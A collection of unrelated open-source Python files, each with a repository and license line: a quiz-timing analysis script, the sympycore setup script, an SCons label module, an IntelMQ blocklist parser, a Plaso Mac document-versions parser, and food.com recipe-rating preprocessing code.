'histogramFile': 'Prefix for filename of histogram output files',
'histogramInterval': 'Interval size for histogram categories'}
type1dimensions = ['Openness','Neuroticism','Extraversion','Conscientiousness','Agreeableness']
# Usage info
def printUsageInfo():
print("Evaluation of correctness depending on time taken to answer a question")
print()
print("Usage: evaluationTime.py",(" ".join(map(lambda x: '['+x+'=...]', sorted(propDesc.keys())))))
for prop in sorted(propDesc.keys()):
print()
print(" "+prop+" (default: "+str(props[prop])+")")
print(" "+propDesc[prop])
print()
# Check whether usage info should be printed out
if '--help' in sys.argv:
printUsageInfo();
exit();
# Overridden properties form command line
for arg in sys.argv[1:]:
k,v = arg.split('=', 2)
props[k]=v
# Helper function to extract (time, correct)-Tuples from the input data
# data is the input data
# quizType is either None (first evaluation) or 0/1 for the second evaluation
def extractTimes(data, quizType = None):
results = []
# Iterate through all quiz sessions in the result
for evalSession in data:
# Check whether the quizType matches
includeSession = True
if quizType is not None:
# Sadly, the quizType hasn't been stored correctly, so we try to
# determine it by the dimension of the first question:
evalSession['quizType'] = 1 if evalSession['questions'][0]['dimension'] in type1dimensions else 0
includeSession = evalSession['quizType'] == quizType
# Skip sessions of the wrong quiz type
if includeSession:
# Iterate through questions
for question in evalSession['questions']:
qTime = question['timeTaken']
qCorrect = question['answer'] not in map(lambda c: c['_id'], question['distractorCharacters'])
results += [(qTime, qCorrect)]
return results
# Write a histogram file
def writeHistogram(filename, data, interval):
data = removeOutliers(data)
histData = {}
maxVal = 0
for d in data:
idx = int(d/interval)+1
if not idx in histData:
histData[idx] = 1
else:
histData[idx] = histData[idx]+1
maxVal = max(idx, maxVal)
with open(filename,'w') as csv:
for n in range(maxVal+1):
if n in histData:
csv.write(str(n*interval)+";"+str(histData[n])+"\n")
else:
csv.write(str(n*interval)+";0\n")
# Method to remove outliers (users taking a nap in front of the screen etc.)
def removeOutliers(values):
q1 = np.percentile(values, 25)
q3 = np.percentile(values, 75)
k = 1.5
kq = k*(q3-q1)
return list(filter(lambda v: q1 - kq < v < q3 + kq, values))
# Returns distribution information
def getDistributionInfo(valuesWithOutliers):
values = removeOutliers(valuesWithOutliers)
return {'mean': mean(values),
'median': median(values),
'totalCount': len(valuesWithOutliers),
'outlierCount': len(valuesWithOutliers)-len(values),
'cleanedCount': len(values),
'stdev': stdev(values)}
# Helper function to read a json file
def readData(filename):
print("Reading:",filename)
data = None
with open(filename,'r') as inFile:
data = json.loads(inFile.read())
return data
print("Analysis of Time Taken to Answer a Question and Corresponding Correctness")
print("─────────────────────────────────────────────────────────────────────────")
print()
# Read input data:
eval1Data = readData(props['evalFile1'])
eval2Data = readData(props['evalFile2'])
print()
# Extract different data series from the input
evalResults = {'eval1': extractTimes(eval1Data),
'eval2-main': extractTimes(eval2Data, 1),
'eval2-sub': extractTimes(eval2Data, 0)}
evalTitles = {'eval1': 'Evaluation 1: Complete Character',
'eval2-main': 'Evaluation 2: Main Dimensions',
'eval2-sub': 'Evaluation 2: Sub Dimensions'}
def printDistributionInfo(header, dInfo):
print(header)
print(" Mean: ",dInfo['mean'])
print(" Standard Deviation: ",dInfo['stdev'])
print()
# Do analysis and write output
for evalRun in sorted(evalResults.keys()):
results = evalResults[evalRun]
# Get two list with times for correct (a[1]==true) and wrong (a[1]==false) answers
# The lists are plain integer lists, as their usage is more comfortable with statistics functions
dataCorrect = list(map(lambda b: int(b[0]), filter(lambda a: a[1], results)))
dataWrong = list(map(lambda b: int(b[0]), filter(lambda a: not a[1], results)))
# Remove outliers and get distribution information for each distribution
distInfoCorrect = getDistributionInfo(dataCorrect)
distInfoWrong = getDistributionInfo(dataWrong)
# Print information about both distributions
print(evalTitles[evalRun])
print((len(evalTitles[evalRun]))*"─")
print("Total Answers: "+str(len(results)))
print(" Correct Answers: "+str(distInfoCorrect['cleanedCount'])+" (excl. "+str(distInfoCorrect['outlierCount'])+" outliers)")
print(" Wrong Answers: "+str(distInfoWrong['cleanedCount'])+" (excl. "+str(distInfoWrong['outlierCount'])+" outliers)")
print()
if props['histogramFile'] is not None:
writeHistogram(props['histogramFile']+"-"+evalRun+"-correct.csv",dataCorrect,int(props['histogramInterval']))
writeHistogram(props['histogramFile']+"-"+evalRun+"-wrong.csv",dataWrong,int(props['histogramInterval']))
printDistributionInfo("Distribution of Correct Answers",distInfoCorrect)
printDistributionInfo("Distribution of Wrong Answers",distInfoWrong)
print()
| Thylossus/tud-movie-character-insights | Server/Tools/evaluation/evaluation-time-correctness/evaluationTime.py | Python | apache-2.0 | 6,081 |
# -*- coding: utf-8 -*-
class Mining(object):
def get_queryset(self):
if not getattr(self, "model", None):
raise NotImplementedError("You must provide a 'model' method for "
"the '%r' Open Mining." % self)
| mining/django-report | report/backends/mining.py | Python | mit | 268 |
#!/usr/bin/env python
CLASSIFIERS = """\
Development Status :: 3 - Alpha
Intended Audience :: Science/Research
License :: OSI Approved
Programming Language :: Python
Topic :: Scientific/Engineering
Topic :: Software Development
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
import os
if os.path.exists('MANIFEST'): os.remove('MANIFEST')
from distutils.core import Extension, Command
from distutils.command.build_py import build_py as _build_py
expr_ext = Extension('sympycore.expr_ext',
sources = [os.path.join('src','expr_ext.c')],
)
combinatorics_ext = Extension('sympycore.arithmetic.combinatorics',
sources = [os.path.join('sympycore','arithmetic','combinatorics.c')],
)
extensions = [expr_ext,
#combinatorics_ext
]
packages = ['sympycore',
'sympycore.algebras',
'sympycore.arithmetic',
'sympycore.arithmetic.mpmath',
'sympycore.arithmetic.mpmath.calculus',
'sympycore.arithmetic.mpmath.functions',
'sympycore.arithmetic.mpmath.libmp',
'sympycore.arithmetic.mpmath.matrices',
'sympycore.basealgebra',
'sympycore.calculus',
'sympycore.calculus.functions',
'sympycore.functions',
'sympycore.heads',
'sympycore.logic',
'sympycore.matrices',
'sympycore.polynomials',
'sympycore.physics',
'sympycore.physics.sysbio',
'sympycore.ring',
'sympycore.sets',
]
packages += [p+'.tests' for p in packages \
if os.path.exists(os.path.join(p.replace('.', os.sep), 'tests'))]
class tester(Command):
description = "run sympycore tests"
user_options = [('nose-args=', 'n', 'arguments to nose command'),
('with-coverage', 'c', 'use nose --with-coverage flag'),
('cover-package=', None, 'use nose --cover-package flag'),
('detailed-errors', 'd', 'use nose --detailed-errors flag'),
('nocapture', 's', 'use nose --nocapture flag'),
('nose-verbose', 'v', 'use nose --verbose flag'),
('match=', 'm', 'use nose --match flag'),
('profile', 'p', 'use nose --profile flag'),
('with-doctest', None, 'use nose --with-doctest flag'),
('stop', 'x', 'use nose --stop flag')
]
def initialize_options(self):
self.nose_args = None
self.with_coverage = None
self.cover_package = None
self.detailed_errors = None
self.nocapture = None
self.nose_verbose = None
self.match = None
self.profile = None
self.with_doctest = None
self.stop = None
return
def finalize_options (self):
if self.nose_args is None:
self.nose_args = ''
if self.with_coverage:
self.nose_args += ' --with-coverage'
if self.cover_package:
if not self.with_coverage:
self.nose_args += ' --with-coverage'
self.nose_args += ' --cover-package=%s' % self.cover_package
elif self.with_coverage:
self.nose_args += ' --cover-package=sympycore'
if self.detailed_errors:
self.nose_args += ' --detailed-errors'
if self.nocapture:
self.nose_args += ' --nocapture'
if self.nose_verbose:
self.nose_args += ' --verbose'
if self.match:
self.nose_args += ' --match=%r' % (self.match)
if self.profile:
self.nose_args += ' --with-profile'
if self.with_doctest:
self.nose_args += ' --with-doctest'
if self.stop:
self.nose_args += ' --stop'
return
def run(self):
import sympycore
sympycore.test(nose_args=self.nose_args)
class build_py(_build_py):
def find_data_files (self, package, src_dir):
files = _build_py.find_data_files(self, package, src_dir)
if package=='sympycore':
revision = self._get_svn_revision(src_dir)
if revision is not None:
target = os.path.join(src_dir, '__svn_version__.py')
print 'Creating ', target
f = open(target,'w')
f.write('version = %r\n' % (str(revision)))
f.close()
import atexit
def rm_file(f=target):
try: os.remove(f); print 'Removed ',f
except OSError: pass
try: os.remove(f+'c'); print 'Removed ',f+'c'
except OSError: pass
atexit.register(rm_file)
files.append(target)
if package=='sympycore.arithmetic.mpmath':
f = os.path.join(src_dir, 'REVISION')
if os.path.isfile(f):
files.append(f)
return files
def _get_svn_revision(self, path):
"""Return path's SVN revision number.
"""
import os, sys, re
revision = None
m = None
try:
sin, sout = os.popen4('svnversion')
m = re.match(r'(?P<revision>\d+)', sout.read())
except:
pass
if m:
revision = int(m.group('revision'))
return revision
if sys.platform=='win32' and os.environ.get('SVN_ASP_DOT_NET_HACK',None):
entries = os.path.join(path,'_svn','entries')
else:
entries = os.path.join(path,'.svn','entries')
if os.path.isfile(entries):
f = open(entries)
fstr = f.read()
f.close()
if fstr[:5] == '<?xml': # pre 1.4
m = re.search(r'revision="(?P<revision>\d+)"',fstr)
if m:
revision = int(m.group('revision'))
else: # non-xml entries file --- check to be sure that
m = re.search(r'dir[\n\r]+(?P<revision>\d+)', fstr)
if m:
revision = int(m.group('revision'))
return revision
if __name__ == '__main__':
from distutils.core import setup
setup(name='sympycore',
version='0.2-svn',
author = 'Pearu Peterson, Fredrik Johansson',
author_email = 'sympycore@googlegroups.com',
license = 'http://sympycore.googlecode.com/svn/trunk/LICENSE',
url = 'http://sympycore.googlecode.com',
download_url = 'http://code.google.com/p/sympycore/downloads/',
classifiers=filter(None, CLASSIFIERS.split('\n')),
description = 'SympyCore: an efficient pure Python Computer Algebra System',
long_description = '''\
SympyCore project provides a pure Python package sympycore for
representing symbolic expressions using efficient data structures as
well as methods to manipulate them. Sympycore uses a clear algebra
oriented design that can be easily extended.
''',
platforms = ["All"],
packages = packages,
ext_modules = extensions,
package_dir = {'sympycore': 'sympycore'},
cmdclass=dict(test=tester, build_py=build_py)
)
| pearu/sympycore | setup.py | Python | bsd-3-clause | 7,372 |
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')
@classmethod
def make_label(cls, label_str):
package_str = None
target_str = None
if not isinstance(label_str, str):
# Assume it is a SCons File node.
label_str = label_str.srcnode().path
package_str, target_str = os.path.split(label_str)
elif label_str.startswith('#'):
label_str = label_str[1:]
if ':' in label_str:
package_str, target_str = label_str.split(':', 1)
else:
package_str = label_str
elif label_str.startswith(':'):
target_str = label_str[1:]
else:
target_str = label_str
package_name = PackageName.make_package_name(package_str)
if not target_str:
target_str = os.path.basename(package_name.path)
target_name = TargetName(target_str)
return cls(package_name, target_name)
@classmethod
def make_label_list(cls, label_strs):
if isinstance(label_strs, str):
label_strs = label_strs.split()
return [cls.make_label(label_str) for label_str in label_strs]
@staticmethod
def check_name(name):
if not name:
raise ValueError('empty name')
if name.startswith('/') or name.endswith('/'):
raise ValueError('leading or trailing path separator: %s' % name)
if '//' in name:
raise ValueError('consecutive path separators: %s' % name)
if not Label.VALID_NAME.match(name):
raise ValueError('invalid name character: %s' % name)
def __init__(self, package_name, target_name):
assert isinstance(package_name, PackageName)
assert isinstance(target_name, TargetName)
self.package_name = package_name
self.target_name = target_name
def __str__(self):
return '#%s:%s' % (self.package_name, self.target_name)
def __repr__(self):
return '%s("%s")' % (self.__class__.__name__, str(self))
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
pass
class LabelOfFile(Label):
pass
class PackageName(object):
@classmethod
def make_package_name(cls, package_str=None):
assert package_str is None or isinstance(package_str, str)
if not package_str:
package_str = Dir('.').srcnode().path
return cls(package_str)
def __init__(self, package_name):
assert isinstance(package_name, str)
Label.check_name(package_name)
self.package_name = package_name
def __str__(self):
return self.package_name
def __repr__(self):
return 'PackageName("%s")' % self.package_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.package_name)
@property
def path(self):
return self.package_name
class TargetName(object):
def __init__(self, target_name):
assert isinstance(target_name, str)
Label.check_name(target_name)
self.target_name = target_name
def __str__(self):
return self.target_name
def __repr__(self):
return 'TargetName("%s")' % self.target_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.target_name)
@property
def path(self):
return self.target_name
| clchiou/scons_package | label.py | Python | mit | 4,231 |
# -*- coding: utf-8 -*-
"""
Generic parser for mapping a line to selected field discarding comments (#).
Handy for parsing various blocklist sets.
"""
import sys
import dateutil
from ipaddress import ip_network
from intelmq.lib import utils
from intelmq.lib.bot import Bot
from intelmq.lib.message import Event
class GenericIPlistParserBot(Bot):
def init(self):
#self.parameters.direction
#self.parameters.clstype
pass
def process(self):
report = self.receive_message()
raw_report = utils.base64_decode(report.get("raw"))
for row in raw_report.splitlines():
row = row.strip()
if row.startswith("#") or len(row) == 0:
continue
event = Event(report)
ipn = ip_network(row)
subkey = ".ip" if ipn.num_addresses == 1 else ".network"
event.add(self.parameters.direction + subkey, row)
event.add('classification.type', self.parameters.clstype)
self.send_message(event)
self.acknowledge_message()
if __name__ == "__main__":
bot = GenericIPlistParserBot(sys.argv[1])
bot.start()
| pkug/intelmq | intelmq/bots/parsers/generic/parser_netset.py | Python | agpl-3.0 | 1,172 |
# -*- coding: utf-8 -*-
"""Parser for the Mac OS X Document Versions files."""
from plaso.containers import time_events
from plaso.lib import eventdata
from plaso.parsers import sqlite
from plaso.parsers.sqlite_plugins import interface
__author__ = 'Joaquin Moreno Garijo (Joaquin.MorenoGarijo.2013@live.rhul.ac.uk)'
class MacDocumentVersionsEvent(time_events.PosixTimeEvent):
"""Convenience class for a entry from the Document Versions database."""
DATA_TYPE = u'mac:document_versions:file'
def __init__(self, posix_time, name, path, version_path, last_time, user_sid):
"""Initializes the event object.
Args:
posix_time: The POSIX time value.
name: name of the original file.
path: path from the original file.
version_path: path to the version copy of the original file.
last_time: the system user ID of the user that opened the file.
user_sid: identification user ID that open the file.
"""
super(MacDocumentVersionsEvent, self).__init__(
posix_time, eventdata.EventTimestamp.CREATION_TIME)
self.name = name
self.path = path
self.version_path = version_path
# TODO: shouldn't this be a separate event?
self.last_time = last_time
# Note that the user_sid value is expected to be a string.
self.user_sid = u'{0!s}'.format(user_sid)
class MacDocumentVersionsPlugin(interface.SQLitePlugin):
"""Parse the Mac OS X Document Versions SQLite database.."""
NAME = u'mac_document_versions'
DESCRIPTION = u'Parser for document revisions SQLite database files.'
# Define the needed queries.
# name: name from the original file.
# path: path from the original file (include the file)
# last_time: last time when the file was replicated.
# version_path: path where the version is stored.
# version_time: the timestamp when the version was created.
QUERIES = [
((u'SELECT f.file_name AS name, f.file_path AS path, '
u'f.file_last_seen AS last_time, g.generation_path AS version_path, '
u'g.generation_add_time AS version_time FROM files f, generations g '
u'WHERE f.file_storage_id = g.generation_storage_id;'),
u'DocumentVersionsRow')]
# The required tables for the query.
REQUIRED_TABLES = frozenset([u'files', u'generations'])
# The SQL field path is the relative path from DocumentRevisions.
# For this reason the Path to the program has to be added at the beginning.
ROOT_VERSION_PATH = u'/.DocumentRevisions-V100/'
def DocumentVersionsRow(
self, parser_mediator, row, query=None, **unused_kwargs):
"""Parses a document versions row.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
row: The row resulting from the query.
query: Optional query string.
"""
# Note that pysqlite does not accept a Unicode string in row['string'] and
# will raise "IndexError: Index must be int or string".
# version_path = "PerUser/UserID/xx/client_id/version_file"
# where PerUser and UserID are a real directories.
paths = row['version_path'].split(u'/')
if len(paths) < 2 or not paths[1].isdigit():
user_sid = u''
else:
user_sid = paths[1]
version_path = self.ROOT_VERSION_PATH + row['version_path']
path, _, _ = row['path'].rpartition(u'/')
event_object = MacDocumentVersionsEvent(
row['version_time'], row['name'], path, version_path,
row['last_time'], user_sid)
parser_mediator.ProduceEvent(event_object, query=query)
sqlite.SQLiteParser.RegisterPlugin(MacDocumentVersionsPlugin)
| dc3-plaso/plaso | plaso/parsers/sqlite_plugins/mac_document_versions.py | Python | apache-2.0 | 3,581 |
from resources.datatables import PlayerFlags
import sys
def setup():
return
def run(core, actor, target, commandString):
ghost = actor.getSlottedObject('ghost')
ghost.toggleFlag(PlayerFlags.FACTIONRANK)
return
| agry/NGECore2 | scripts/commands/toggledisplayingfactionrank.py | Python | lgpl-3.0 | 232 |
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 10 15:39:31 2015
This file provides the routines to preprocess and prepare foodcom data in order
to have a quality set of datasets, following some simple rules:
- users have at least 4 event ratings
- items/recipes have at least 4 event ratings
- the output files will be in libsvm format
@author: rui.maia
"""
from __future__ import division
import sys
import os
sys.path.append(os.path.abspath("Tools"))
from preprocess import *
import pandas as pd
import csv
from random import shuffle
AVG_USER = 1
STD_USER = 2
AVG_STD_USER = 3
AVG_ITEM = 1
STD_ITEM = 2
AVG_STD_ITEM = 3
next_free_id = 1
hash_user = {}
hash_rec = {}
hash_ing = {}
hash_diet = {}
hash_cuis = {}
#==============================================================================
# Receives a dataset and ovewrites it cutting the original file to a
# count (input parameter) number of entries
#==============================================================================
def foodcom_CutSave(datafile, count):
print "Datafile:%s" % datafile
print "Final Count:%d" % count
total_rat_cnt = 0
complete_ds = []
try:
with open(datafile) as f:
for line in f:
line = line.strip()
complete_ds.append(line)
total_rat_cnt += 1
f.close()
except ValueError:
print "Error on line %d" % total_rat_cnt
raise
print "Total Rating Count in Dataset " + datafile + " is " + str(total_rat_cnt)
print "Shuffling and cutting complete dataset to a total of %d lines" % count
shuffle(complete_ds)
final_ds = complete_ds[:count]
print "Writing train dataset to txt file"
f = open(datafile, "w")
f.write("\n".join(map(lambda x: str(x), final_ds)))
f.close()
print "Finished shuffling and cutting file"
return 1
########################################################################################
# Remove foodcom untrustable ratings (count item and user rating events, then filter)
########################################################################################
def foodcom_QualityFilter(rat_ds, out_base_ds, min_user, min_item):
# pass in column names for each CSV
print 'Loading ratings...'
ratings_cols = ['rating', 'user', 'id']
ratings = pd.read_csv(rat_ds, sep='\t', names=ratings_cols)
print 'Ratings Shape: %s' % str(ratings.shape)
print 'Remove untrustable users and recipes...'
atleast_5 = ratings.groupby('id').filter(lambda x: len(x) >= min_item)
print 'Ratings (>' + str(min_item) + ' item event rating) shape' + str(atleast_5.shape)
final_ds = atleast_5.groupby('user').filter(lambda y: len(y) >= min_user)
print 'Ratings (>' + str(min_user) + ' user event rating) shape' + str(final_ds.shape)
######################### DS OUPUT
final_ds_len = final_ds.shape[0]
atleast_5_len = atleast_5.shape[0]
while final_ds_len != atleast_5_len:
print 'Remove untrustable users and recipes...'
atleast_5 = final_ds.groupby('id').filter(lambda x: len(x) >= min_item)
print 'Ratings (>' + str(min_item) + ' item event rating) shape' + str(atleast_5.shape)
final_ds = atleast_5.groupby('user').filter(lambda y: len(y) >= min_user)
print 'Ratings (> ' + str(min_user) + ' user event rating) shape' + str(final_ds.shape)
final_ds_len = final_ds.shape[0]
atleast_5_len = atleast_5.shape[0]
print 'Saving DS base dataset with shape ' + str(final_ds.shape)
final_ds.to_csv(out_base_ds, sep='\t', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id'])
print '...done'
###########################################################################
######### Load recipe information from files got from foodcom site
###########################################################################
def foodcom_LoadData(rec_ing_file, rec_cuis_file, rec_diet_file):
data = {}
ingredients = {}
cuisines = {}
diets = {}
try:
# ingredients
file = open(rec_ing_file)
for line in file:
# get recipe id
fields=line.split('\t')
rec_id = fields[2].strip()
# if dictionary empty: set ingredients for recipe
if rec_id not in data:
# get recipe ingredients
rec_ings = fields[3:]
for elem in rec_ings:
elem = elem.strip()
if len(elem) > 0: ingredients[elem] = ingredients.get(elem, 0) + 1
tempData = dict()
tempData['MainIng']=(",".join(rec_ings)).strip()
data[rec_id] = tempData
except IndexError:
print 'Error in file:' + rec_ing_file
print line
raise
try:
# cuisine
file = open(rec_cuis_file)
for line in file:
# get recipe id
fields=line.split('\t')
rec_id = fields[2]
tempData = data[rec_id.strip()]
if 'Cuisine' not in tempData:
# get recipe cuisines
rec_cuis = fields[3:]
for elem in rec_cuis:
elem = elem.strip()
if len(elem) > 0: cuisines[elem] = cuisines.get(elem, 0) + 1
tempData['Cuisine']=(",".join(rec_cuis)).strip()
except IndexError:
print 'Error in file:' + rec_cuis_file
print line
raise
try:
# dietary
file = open(rec_diet_file)
for line in file:
# get recipe id
fields=line.split('\t')
rec_id = fields[2]
tempData = data[rec_id.strip()]
if 'Dietary' not in tempData:
# get recipe dietaries
rec_diets = fields[3:]
for elem in rec_diets:
elem = elem.strip()
if len(elem) > 0: diets[elem] = diets.get(elem, 0) + 1
tempData['Dietary']=(",".join(rec_diets)).strip()
except IndexError:
print 'Error in file:' + rec_diet_file
print line
raise
print 'Recipes (count): %d' % len(data.keys())
print 'Saving different Ingredients %d' % len(ingredients)
with open('Data\\foodcom_ingredients.txt', 'w') as writer:
writer.write('Ingredient\tRecipeCount\n')
for key, entry in ingredients.items():
writer.write('%s\t%d\n' % (key.strip(), entry))
print 'Saving different Cuisines %d' % len(cuisines)
with open('Data\\foodcom_cuisines.txt', 'w') as writer:
writer.write('Cuisine\tRecipeCount\n')
for key, entry in cuisines.items():
writer.write('%s\t%d\n' % (key.strip(), entry))
print 'Saving different Diets %d' % len(diets)
with open('Data\\foodcom_diets.txt', 'w') as writer:
writer.write('Diet\tRecipeCount\n')
for key, entry in diets.items():
writer.write('%s\t%d\n' % (key.strip(), entry))
'''
for key, value in data.iteritems():
if len(value['MainIng']) > 0:
value['MainIng'] = value['MainIng'][:-1]
if len(value['Dietary']) > 0:
value['Dietary'] = value['Dietary'][:-1]
if len(value['Cuisine']) > 0:
value['Cuisine'] = value['Cuisine'][:-1]
'''
return data
## Generates the base needed datasets
# pre_foodcom_ds8 - Rating + Users + Item + Ingredients
# pre_foodcom_ds9 - Rating + Users + Item + Ingredients + Dietary
# pre_foodcom_ds10 - Rating + Users + Item + Ingredients + Dietary + Cuisine
# pre_foodcom_ds14 - Rating + Users + Item + Dietary
# pre_foodcom_ds15 - Rating + Users + Item + Cuisine
def foodcom_GenerateBaseDS(basic_ds_path, recipe_inf_lst, out_baseds):
col_names = ['rating', 'user', 'id', 'ingredients', 'cuisine', 'dietary']
final = []
errors = 0
with open(basic_ds_path) as basic_ds:
for line in basic_ds:
try:
(rating, user, item) = (line.strip()).split(SEP_CHAR)
rec_info = recipe_inf_lst[item]
final.append((rating, user, item, rec_info['MainIng'], rec_info['Cuisine'], rec_info['Dietary']))
except KeyError:
# print line
#raise
errors += 1
print 'Total recipes with info[%d] and no info on [%d]' % (len(final), errors)
print 'Saving to csv...'
complete_ds = pd.DataFrame(final, columns=col_names)
complete_ds.to_csv(out_baseds, sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients', 'dietary', 'cuisine'])
complete_ds.to_csv('Data\\pre_foodcom_ds', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id'])
complete_ds.to_csv('Data\\pre_foodcom_ds8', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients'])
complete_ds.to_csv('Data\\pre_foodcom_ds9', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients', 'dietary'])
complete_ds.to_csv('Data\\pre_foodcom_ds10', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients', 'dietary', 'cuisine'])
complete_ds.to_csv('Data\\pre_foodcom_ds14', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'dietary'])
complete_ds.to_csv('Data\\pre_foodcom_ds15', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'cuisine'])
def foodcom_GenerateFeatureIds(complete_ds):
global next_free_id
global hash_user
global hash_rec
global hash_ing
global hash_diet
global hash_cuis
total_rat_cnt = 0
total_cui_set = 0
total_diet_set = 0
total_ing_set = 0
rate_sum = 0
try:
with open(complete_ds) as f:
for line in f:
line = line.strip()
(rating, user, recipeid, ingredient_str, dietary_str, cuisine_str)=line.split(';')
rate_sum += int(rating)
# USER ----------- get id for user
feature_id = hash_user.get(user, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_user[user] = next_free_id
next_free_id += 1
# RECIPE ---------- get id for recipeid
feature_id = hash_rec.get(recipeid, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_rec[recipeid] = next_free_id
next_free_id += 1
# INGREDIENTS -----------------
if len(ingredient_str) >0:
ingredient_list = ingredient_str.split(',')
else:
ingredient_list = []
# for each ingredient
for ing in ingredient_list:
total_ing_set += 1
# get id for recipeid
feature_id = hash_ing.get(ing, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_ing[ing] = next_free_id
next_free_id += 1
# DIETARY -----------------------------
if len(dietary_str) >0:
diet_list = dietary_str.split(',')
else:
diet_list = []
# for each ingredient
for diet in diet_list:
total_diet_set += 1
# get id for recipeid
feature_id = hash_diet.get(diet, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_diet[diet] = next_free_id
next_free_id += 1
# CUISINE -----------------------------
if len(cuisine_str) >0:
cuis_list = cuisine_str.split(',')
else:
cuis_list = []
# for each ingredient
for cuis in cuis_list:
total_cui_set += 1
# get id for recipeid
feature_id = hash_cuis.get(cuis, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_cuis[cuis] = next_free_id
next_free_id += 1
total_rat_cnt += 1
except ValueError:
print "Error on line %d: %s" % (total_rat_cnt, line)
raise
f = open('Data\\foodcom_classification', 'w')
f.write('Number of users:%d\n' % len(hash_user.keys()))
f.write('Number of items:%d\n' % len(hash_rec.keys()))
f.write('Number of events:%d\n' % total_rat_cnt)
f.write('Number of ingredients:%d\n' % len(hash_ing.keys()))
f.write('Number of cuisine types:%d\n' % len(hash_cuis.keys()))
f.write('Number of dietary groups:%d\n' % len(hash_diet.keys()))
f.write('Avg. rating value:%0.2f\n' % (rate_sum/total_rat_cnt))
f.write('Avg. number of ratings per user:%0.2f\n' % (total_rat_cnt/len(hash_user.keys())))
f.write('Avg. number of ratings per item:%0.2f\n' % (total_rat_cnt/len(hash_rec.keys())))
f.write('Avg. number of ingredients per item:%0.2f\n' % ((total_ing_set/len(hash_rec.keys()))))
f.write('Avg. number of cuisine type per item:%0.2f\n' % ((total_cui_set/len(hash_rec.keys()))))
f.write('Avg. number of dietary groups per item:%0.2f\n' % ((total_diet_set/len(hash_rec.keys()))))
f.write('Sparsity on the ratings matrix:%0.3f%%\n' % percentage(total_rat_cnt ,(len(hash_user.keys())*len(hash_rec.keys()))))
f.close()
return next_free_id
def percentage(part, whole):
return 100 * float(part)/float(whole)
def foodcom_CsvtoLibsvm(datafile, outdatafile, is_ing, is_diet, is_cuis):
global next_free_id
global hash_user
global hash_rec
global hash_ing
global hash_diet
global hash_cuis
total_rat_cnt = 0
complete_ds = []
try:
with open(datafile) as f:
for line in f:
entry = []
line = line.strip()
if (is_ing == False and is_diet == False and is_cuis == False):
(rating, user, recipeid)=line.split(';')
if (is_ing == True and is_diet == False and is_cuis == False):
(rating, user, recipeid, ingredient_str)=line.split(';')
elif (is_ing == True and is_diet == True and is_cuis == False):
(rating, user, recipeid, ingredient_str, dietary_str)=line.split(';')
elif (is_ing == True and is_diet == True and is_cuis == True):
(rating, user, recipeid, ingredient_str, dietary_str, cuisine_str)=line.split(';')
elif (is_ing == False and is_diet == True and is_cuis == False):
(rating, user, recipeid, dietary_str)=line.split(';')
elif (is_ing == False and is_diet == False and is_cuis == True):
(rating, user, recipeid, cuisine_str)=line.split(';')
entry.append(rating) # append rating to libSVM format
# USER ----------- get id for user
feature_id = hash_user.get(user, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_user[user] = next_free_id
next_free_id += 1
entry.append("%d:1" % hash_user[user]) # append user feature to libSVM format
# RECIPE ---------- get id for recipeid
feature_id = hash_rec.get(recipeid, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_rec[recipeid] = next_free_id
next_free_id += 1
entry.append("%d:1" % hash_rec[recipeid]) # append user feature to libSVM format
# INGREDIENTS -----------------
if is_ing:
if len(ingredient_str) >0:
ingredient_list = ingredient_str.split(',')
else:
ingredient_list = []
# for each ingredient
for ing in ingredient_list:
# get id for recipeid
feature_id = hash_ing.get(ing, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_ing[ing] = next_free_id
next_free_id += 1
entry.append("%d:1" % hash_ing[ing]) # append ingredient feature to libSVM format
# DIETARY -----------------------------
if is_diet:
if len(dietary_str) >0:
diet_list = dietary_str.split(',')
else:
diet_list = []
# for each ingredient
for diet in diet_list:
# get id for recipeid
feature_id = hash_diet.get(diet, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_diet[diet] = next_free_id
next_free_id += 1
entry.append("%d:1" % hash_diet[diet]) # append dietary feature to libSVM format
# CUISINE -----------------------------
if is_cuis:
if len(cuisine_str) >0:
cuis_list = cuisine_str.split(',')
else:
cuis_list = []
# for each ingredient
for cuis in cuis_list:
# get id for recipeid
feature_id = hash_cuis.get(cuis, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_cuis[cuis] = next_free_id
next_free_id += 1
entry.append("%d:1" % hash_cuis[cuis]) # append cuisine feature to libSVM format
complete_ds.append(entry)
total_rat_cnt += 1
except ValueError:
print "Error on line %d: %s" % (total_rat_cnt, line)
raise
with open(outdatafile, 'wb') as f:
writer = csv.writer(f, delimiter = '\t')
writer.writerows(complete_ds)
print 'Saved file %s with %d entries' % (outdatafile, total_rat_cnt)
return next_free_id
